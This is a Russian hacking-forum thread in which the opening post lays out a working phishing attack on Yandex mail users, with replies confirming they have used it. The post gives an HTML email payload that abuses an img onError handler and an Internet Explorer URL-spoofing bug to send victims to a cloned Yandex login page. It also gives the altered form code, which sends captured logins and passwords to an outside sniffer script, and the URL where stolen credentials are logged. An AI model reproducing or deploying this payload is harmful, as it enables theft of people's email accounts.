|
Много спрашивают о взломе яндекс.ру. И почему-то все забывают о старинном методе с впариванием левой формы для авторизации. Такого материала было выпущено много, но как всегда порадовал своим долбо#$измом хакер.ру
Цитата из статьи журнала (за 2004-й г. кстати):</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата </td></tr><tr><td id="QUOTE"> "Ты никогда не думал, как хакеры могут выдирать пароли от почтовых ящиков? Как они получают к ним доступ? Задумывался ли ты о том, что хакеры могут выманить пароль у тебя самого, и при этом ты даже не заметишь, что что-то произошло? Нет? А такое вполне вероятно. Не веришь – читай дальше." [/QUOTE]<span id='postcolor'>А дальше рассказывается о "взломе" путем просьбы о прохождении повторной регистрации (ссылка на копию главной страницы почтовика с поддельным ACTION). Не знаю, может кто-то ничего и не заметит))) К сожалению почта яндекса на сегодняшний день как-то не особо ломается), поэтому придется пользоваться этим давно известным, "незаметным" способом. Расчитано на женщин, детей и стариков)) И все-таки мы не хакеры в отличае от тех "околокомпьютерных журналистов", никаких писем от "службы поддержки" не будет(идиотизм, надо заметить). А будет редирект из почтового ящика. Я нашел только один способ вставить скрипт в письмо, - это обработчик onError(onLoad уже прикрыли). План действий. Пишем письмо, и отправляем как обычно в HTML only на адрес злодея. скрипт письма:</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE"> Текст сообщения. Текст сообщения. Текст сообщения. Текст сообщения. <img src=''onError="status='http://passport.yandex.ru';location=unescape('http://passport.yandex.ru%01@zhelezo.newmail.ru');" width=0 height=0>[/QUOTE]<span id='postcolor'> Этот скрипт делает редирект на сайт http://zhelezo.newmail.ru, где лежит копия страницы http://passport.yandex.ru. Здесь мы используем баг IE с подменой УРЛ, то есть в адресной строке будет отображаться адрес яндекса. На http://zhelezo.newmail.ru, в форме отправки пароля и логина мы произведем некоторые имзменения:</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE"> <Form action=http://zero.h12.ru/stat/capt.php?id=yandex method=GET target="invisible" onSubmit="status='http://passport.yandex.ru';location='http://yandex.ru';"> ......... ......... </form> <iframe name=invisble width=0 height=0></iframe>[/QUOTE]<span id='postcolor'> Во фрейм загрузим сниффер, который примет пароль и пасс, а onSubmit перенаправит нас на главную яндекса. Все. никаких премудростей с действительным заходом в почту, я думаю не нужно! Перед редиректом можно че-нить замутить еще, к примеру алерт с надписью 503:Ошибка шлюза, или какой-нибудь Fatal error on Line xxx)) Это уже на вкус, в любом случае метод - для женщин детей и стариков) Подытожу. Шлем письмо: <img src=''onError="status='http://passport.yandex.ru';location=unescape('http://passport.yandex.ru%01@zhelezo.newmail.ru');" width=0 height=0> Если юзер попался на уловку, - пароль будет лежать здесь: http://zero.h12.ru/stat/log.php?id=yandex |
Действеный спосбоб Джаз ! ПО моему прокатит !
|
Не такой уж и действенный, но лучше пока нет)
|
Гм ) прокатывает на особо не умных юзерей
|
хороша статейка всё катит я пробывал спасибо за предложенный метод.
|
А чё yandex уже и onError прикрыл?
|
JazzzSummerMan, ну, письмо от службы поддержки не такая уж и фигня... http://forum.antichat.ru/iB_html/non...cons/smile.gif очень даже действенный метод между прочим http://forum.antichat.ru/iB_html/non...cons/smile.gif
|
маленьких девочек ,не хорошо обманывать.вот..
|
Точно всё работает, только интересно, почему пароль и логин иногда не доходят?
|
Хостинг такой на holm.ru
|
| Время: 17:56 |